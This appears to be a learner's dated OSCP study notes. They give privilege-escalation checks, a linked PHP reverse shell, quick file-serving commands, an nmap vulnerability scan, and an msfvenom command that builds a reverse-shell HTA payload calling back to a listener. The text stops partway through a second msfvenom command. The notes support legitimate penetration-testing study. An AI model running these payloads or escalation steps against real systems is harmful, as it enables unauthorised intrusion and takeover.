August OSCP Notes
August 4, 2020 sudo -u scriptmanager /bin/bash /bin/bash -i Sherlock for Windows. linuxprivcheck for Linux. Domain Controller (DC) is head honcho of Active Directory Check crontab to see if root is running anything sudo -l to see what you can do August 19, 2020 https://www.youtube.com/watch?v=5Tlx7D2djes Delete all your snapshots. Use gparted. Delete anything in the middle. Slide over. c:\windows\system32\drivers\etc\hosts August 20, 2020 https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php (Has worked before > php -S 0.0.0.0:80 exists like python -m SimpleHttpServer 80 ruby -run -e httpd . -p 9000 August 22, 2020 Can create HTA files to execute in Internet Explorer sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta August 23, 2020 nmap --script vuln -p139,445 192.168.0.18 sudo -i (rage) August 24, 2020 msfvenom -p windows/s...